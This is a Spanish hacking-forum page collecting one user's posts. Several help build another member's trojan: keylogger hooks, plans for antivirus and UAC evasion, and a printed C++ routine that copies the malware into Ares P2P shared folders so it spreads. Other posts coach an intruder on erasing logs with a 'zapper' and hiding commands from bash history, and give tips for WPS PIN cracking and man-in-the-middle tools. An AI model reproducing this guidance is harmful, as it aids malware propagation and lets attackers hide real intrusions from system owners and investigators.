Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - rand0m

#121
Lo realmente preocupante no es que muestre anuncios, sino que por lo general el visor de anuncios suele estar basado en InternetExplorer, y por ahí puede entrar de todo.
No digo que tenga que ser sistemático, pero envenenar la red para controlar la fuente de anuncios me puede ayudar a ejecutar código malicioso en tu Solitario (¿Para qué añadir funciones de red a solitario.exe? ¿Estamos tontos o qué pasa?).

Sinceramente no me fío un pelo de Windows 10, y menos después del You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Me huele a que quieren metérnosla doblada a todos regalándonos un SO lleno de boquetes de seguridad provocados.

#122
Uniendo pilas recargables es fácil llegar a los 12V 2A.
#123
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
antes era todo por placer, hoy es todo por dinero.
Antes no había carreras universitarias ni formación especializada, los sistemas eran "cosas de geeks".
#124
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El problema de colectividad ya logre resolverlo, y quite el uso de la API GetAsyncKeyState, y coloque el HOOK en el teclado. y ahora todo funciona mas fluido y sin consumir tantos recursos.
Siempre había visto hacer directamente el hook al teclado para capturar las pulsaciones, por eso tu sistema me confundía un poco.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias por la opinion!
Te veo con este proyecto bien llevado, y más que dar mi opinión el objetivo siempre será compartir ideas. Como una noticia que leí hoy en el blog de Chema Alonso en el que comentaban You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Me pareció interesantísimo para este troyano (Para éste y para muchas cosas).
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pero ahora modificare el cliente, para que se ajuste a la resolución de pantalla dependiendo en cada ordenador que se ejecute, y le quitare la transparencia.
Ok, me gusta. ¿Lo subirás actualizado?

** EDIT **
He enviado un email al autor de la entrada del blog preguntándole si le gustaría compartir el código con nosotros. Crucemos los dedos.
#125
Me gusta mucho más que el Nivo Slider. Muchas gracias.
#126
Front-end / Re:[Libro] HTML5 - Arkaltz Garro
Agosto 01, 2015, 06:41:14 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No se limita solo a crear nuevas etiquetas o atributos, sino que incorpora muchas características nuevas y proporciona una plataforma de desarrollo de complejas aplicaciones web (mediante los APIs).
Sólo hay que ver las nuevas páginas web como Facebook o Twitter. Su funcionamiento es brutal.
Me había quedado muy atrás (Pero mucho, ¿eh?) en HTML desde que se incorporó HTML5. Con estas 172 páginas espero ponerme un poco al día.
Muchas gracias!
#127
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No claro, algo implementare.
Me encanta. A ver qué sale. Pero tienes razón, todo a su tiempo.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
le estoy dando prioridad a un error de conexion que tiene el servidor (este si pierde la conexion, y no logra reconectar luego de varios minutos, queda en nada, y consume mucho uso del CPU)
Quizá sea culpa del keylogger offline. Es un buen momento para estudiar el funcionamiento offline del bicho con un depurador como You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Estoy intentando compilar el código fuente pero estoy teniendo algún que otro problema. ¿Utilizaste algún IDE? ¿Qué compilador estás utilizando? Lo intento desde Code::Blocks con mingw32-gcc-g++ 4.8.1-4.

**EDIT**: Estoy jugando con la versión que has compilado tú y hay algunas cosas que no me gustan, comenzando por la transparencia en las ventanas. Habrá a quien le guste, pero me parece que sólo añade peso al programa sin cumplir ninguna función interesante. Además, dependiendo de la resolución de la pantalla al iniciar el programa, podemos quedarnos con una ventana sin botones que no podemos redimensionar. Adjunto imagen.

Pero bueno, son observaciones mías. Me gustan las cosas con interfaz cutre y funcionamiento óptimo. Los efectos visuales son mero maquillaje. (Aunque no todos piensan como yo)
#128
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
los siguientes paquetes tienen dependencias incumplidas: libsqlite3-dev : depende: libsqlite3-0 (=3.7.13-1+deb7u2) pero 3.7.16.2-1~bpo70+1 va a ser instalado
¿Ese equipo está conectado a Internet?

**EDIT**: Cuando te comenté lo de PixieWPS no estaba hablando de ninguna herramienta en especial, sino de un tipo de ataque determinado.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, además siempre deberíamos leernos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y tener a mano You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
#129
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Fíjense gracias a todos por sus comentarios, he probado con mi red y con otra red de una prima y siempre me ocurre lo mismo intentando incluso directo al pin por eso creo pueda ser un falló......
No sé muy bien a qué te refieres. ¿Podrías pegar la salida de la consola?
Acuérdate de añadir el parámetro -g1 para que termine una vez que se haya comprobado el primer código PIN.
Así, si llega al final, sabremos que el ataque comprobó correctamente si el PIN era válido o no; si se sigue quedando parado es que no llego a comprobar ni siquiera el primer PIN, por lo que probablemente estemos ante algún sistema de seguridad (Que tendríamos que identificar para intentar saltárnoslo).
#130
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Los de la vieja escuela... tenemos mas... paciencia, podiamos estar dias, o semanas snifeando un protocolo y luego programando una tool que lo emulara con raw sockets.

La gente en vez de tomarse ese trabajo buscaba en Google "quiero un programa que ..." y google se los traia,  Nosotros lo veiamos pesimo, por que ellos no aprendian nada,
Quiero recalcar una cosa: Cuando era un pobre Diablo troyanizando el Serv-U con el manual de HackxCrack comprado un Domingo por la mañana en un kiosko también busqué foros y pregunté auténticas estupideces. Lo que cambió no era la clase de preguntas, sino la clase de respuestas.
Hace 10 años, como se entreviese que no habías leído nada acerca del tema, prácticamente si pudieran te inflaban a hostias te despreciaban de por vida.
¿Qué más da que un noob se vaya llorando porque le han dicho que tiene que leer? ¿Sería algún valor añadido al foro? (Por eso no me gusta que tengan que registrarse para ver links, porque así, de paso, preguntan gilipolleces, spamean y reviven temas)

Luego eso se nota en los post de la gente. Algunos post son un link a un vídeo de YouTube sin ningún análisis o comentario (Spam, of course), o un copy/paste de otro sitio. He encontrado tutoriales míos pegados por todas partes, donde se ve el prompt de mi consola. Apuesto 20 a que el que lo pegó ni se lo leyó entero. Se nota que no hay interés en probarlo, modificarlo, analizarlo en profundidad, ver qué coño pasa. El único interés es ejecutar sqlmap contra el resultado de un dork de Google o Bing y obtener la clave de administrador para hacer un deface y decir que somos h4x025. El que me conozca por aquí ya sabe que lo mío no son los buenos modales, pero tampoco se los exijo a nadie. Lo que sí que exijo es un mínimo en la calidad de los posts. No quiero verte ejecutando un código que no es tuyo, quiero conseguir ese código y que lo estudiemos entre todos. Da la sensación de que cada uno va por libre. Ésa es la gran diferencia con la vieja escuela. Recuerdo que un amigo empezó una serie de tutoriales de Metasploit Framework y en eso nos volcamos muchos. Ahora la gente no participa en nada. No lee nada. No hace nada. Parece una búsqueda de información actualizada sin haber estudiado la anterior. No recuerdo cuándo compré aquella revista, pero desde entonces fui encontrando muchísimos más libros que los que podía leer. Eso es atragantarse de información, y no nos lleva más lejos.

Ahora está todo más que mascado. Hay miles de Wargames y tutoriales para resolver dichos Wargames para practicar y experimentar en casa (Defacear páginas web con un script no te convierte en hacker, más bien en un gilipollas lammer). Cientos de tutoriales detallados de cientos de vulnerabilidades, programación, hardening, etc. Venir a un foro para preguntar "ejecuto python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login pero me dice 'sqlmap.py not found'" es tener mucho valor (Por poner un ejemplo).
#131
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Nadie Pudo Encontrar una solución? yo sigo con dolor de cabeza ya de intentarlo.. :'(
Si le dedicases más tiempo a practicar en el juego en vez de buscar la forma de hacer trampas no necesitarías cheats.
Atte: Un jugador de CS-GO muy cabreado.
#132
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
en la segunda imgen puede ver que se puede hacer inyeccion sql
Fíjate bien en lo que te está diciendo la página y lo que viene en Descripción. ¿Qué crees que significa?
#133
Que chulo. Estoy descargándolo para ver qué hace.
Sinceramente no tengo ni idea de cómo se usa, pero voy a dar palos de ciego a ver cómo funciona.
Además el proyecto de XXNEECOXX, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es un buen candidato a salir a la cancha.
#134
Es muy recomendable estar cerca del AP para este tipo de ataques (Se transfieren muchos paquetes pequeños muy rápido, la pérdida es fácil (Retrying last PIN...).
Procura tener una señal de al menos -60dbi, porque si no entras en un ciclo en el que nunca llegará al final.
Eso podrás comprobarlo añadiendo el parámetro -g1, que limita el intento a 1 sólo PIN. ¿Llega al final o se queda intentándolo con el mismo pin una y cien veces?
Últimamente estoy muy Wardriver y estoy jugando con PixieWPS, estudiemos juntos.
#135
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Eso es el historial de  comandos pero tambien hay logs de apache con conexiones http o los del servidor de correo si realizaste la intrusion por ellos deberias borrarlos.

Como ya te dije, de uno en uno o bien usa un zapper...
Tal y como se nos está planteando la pregunta el zapper es la mejor opción. Si sólo quieres borrar los logs de un servicio en particular lo mejor sería irse al archivo de configuración del servicio en cuestión (Por ejemplo /etc/apache2/apache2.conf).
¿Quieres borrar los logs de algún servicio en particular? A por él.
¿Quieres borrar todos los logs que puedas de un plumazo sin buscarlos por el sistema? Un zapper.
¿Quieres borrar todos los logs que puedas sin usar un zapper? Averigua cuáles son los logs que quieres borrar y guarda los archivos clave en una lista. Con ella podrás hacer tu propio zapper en Bash, Perl, Python o Ruby especialmente diseñado para que haga lo que tú quieres (Sin más sorpresas que las "funciones aleatorias que creamos en nuestros programas", mal llamados "bugs").
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Código: bash
[b3n@genesis ~]$  echo "Si se guarda"
[b3n@genesis ~]$ history
  386   echo "Si se guarda"
  387  history
[b3n@genesis ~]$

Vale, bien, tienes razón, no se puede ir con tanta seguridad. Para comprobar eso basta con hacer un par de cositas:
Código: bash
root@box0:/home/rand0m# cat /root/.bashrc |grep HISTCONTROL
root@box0:/home/rand0m# cat /home/rand0m/.bashrc |grep HISTCONTROL
HISTCONTROL=ignoreboth

Revisando el estado de HISTCONTROL en .bashrc podemos ver si nos da juego.
ignorespace es lo que hace que se guarden los comandos con el espacio delante.
ignoreboth es lo que hace que no se guarden los del espacio delante NI LOS REPETIDOS (Como un ls -l nc.log mientras esperamos a que algo se termine de transferir por netcat).
erasedups hace que no se muestren los comandos repetidos en el historial.
Es muy útil conocer esta chorradilla.
#136
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Solo te voy a dar una pista: sslstrip

Otra igual de valida. MITMf
Bueno, venga, vale, hablemos de ettercap.
#137
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Cuando le das al boton ejecutar. El uac dice "Desea ejecutar como administrador" en caso de darle a No, no se ejecutara el programa
es decir que yo podria agregarle un modulo para que obtenga privilegios altos, pero de que sirviria si el UAC salta desde un comienzo diciendo que si desea aceptar ejecutar.
Bueno, hacemos las cosas más complicadas, pero sabemos que hay métodos para evadir AV's y UAC con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Sería cuestión de implementarlo en "el bicho".
Es algo fácil de decir y difícil de implementar, pero ¿tenemos algo mejor que hacer?
#138
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si eso lo tenia en cuenta, pero aun no me he puesto a trabajar en ello, vere que metodo consigo agregarle. así evadirlo.  ::)
Todavía sigo leyéndolo a ratitos y me gusta cómo lo fuiste identificando todo.
Tengo una duda, que creo que es una errata.
OPENSC\Servidor\source\functions.h - Líneas de 498 a 574 (Función Spread_Ares)
Código: cpp
bool __stdcall Spread_Ares ( VOID )
{

HKEY key;
BOOL Install = FALSE;

DWORD cbSize = 256;

LPSTR Path, New, AppName;

AppName = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), MAX_PATH );
Path = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), cbSize + 1 );

if ( RegOpenKeyExA ( HKEY_CURRENT_USER, "Software\\Ares", 0, KEY_QUERY_VALUE, &key ) == ERROR_SUCCESS )
{
Install = TRUE;

RegQueryValueEx ( key, ( LPSTR ) "Sys.Desktop", 0, 0, ( LPBYTE ) Path, & cbSize );

RegCloseKey ( key );
}
else
{

GlobalFree ( AppName );
GlobalFree ( Path );

RegCloseKey ( key );

return FALSE;
}

if ( Install = FALSE )
{

GlobalFree ( AppName );
GlobalFree ( Path );

return FALSE;

}

GetModuleFileNameA ( GetModuleHandleA ( 0L ), AppName, MAX_PATH );

if( PathFileExistsA ( Path ) )
{

for ( int i = 0; lista [ i ] != ( 0x00 ); lista [ i ++ ] )
{

New = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), MAX_PATH );

lstrcatA ( Path, "\\" );
lstrcpyA ( New, Path );
lstrcatA ( New, lista [ i ] );

CopyFileA ( AppName, New, FALSE );

GlobalFree ( New );
}

GlobalFree ( AppName );
GlobalFree ( Path );

return TRUE;

}
else
{
GlobalFree ( Path );
}

GlobalFree ( Path );
GlobalFree ( AppName );

return FALSE;
}

Primero creamos la variable Booleana Install poniéndolo en FALSE, y si el resultado de RegOpenKeyExA es ERROR_SUCCESS ponemos Install a True. Si no, la función devuelve FALSE. Pero además, luego, si Install está en FALSE se vuelve a repetir.
Código: cpp
BOOL Install = FALSE;
if ( RegOpenKeyExA ( HKEY_CURRENT_USER, "Software\\Ares", 0, KEY_QUERY_VALUE, &key ) == ERROR_SUCCESS )
{...}
else
{ GlobalFree ( AppName );
GlobalFree ( Path );
RegCloseKey ( key );
return FALSE;}

if ( Install = FALSE )
{ GlobalFree ( AppName );
GlobalFree ( Path );
return FALSE; }

¿Ésto es por algo o es una errata?
#139
Si ponemos un espacio en blanco al principio del comando éste no se guardará en el histórico.
Código: bash
rand0m@box0:~$ history -c
rand0m@box0:~$  echo "This will not appear on history"
This will not appear on history
rand0m@box0:~$ echo "But this will"
But this will
rand0m@box0:~$ history
    1  echo "But this will"
    2  history
#140
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Eso es cierto, además de que es muy sospechoso. Yo cuando te respondí no pensaba que fuese el Server.
No hagas mucho caso de la captura, la puse para ilustrar el UAC. En realidad no lo compilé, pero estuve viendo el código fuente y no vi ningún intento de escalar privilegios o evadir la seguridad de Windows, por lo que supuse que activaría la alerta en algún momento.
Si el sistema no está parcheado contra You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login podría intentar usarse You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para conseguir privilegios de SYSTEM, con lo que lo demás está rodado.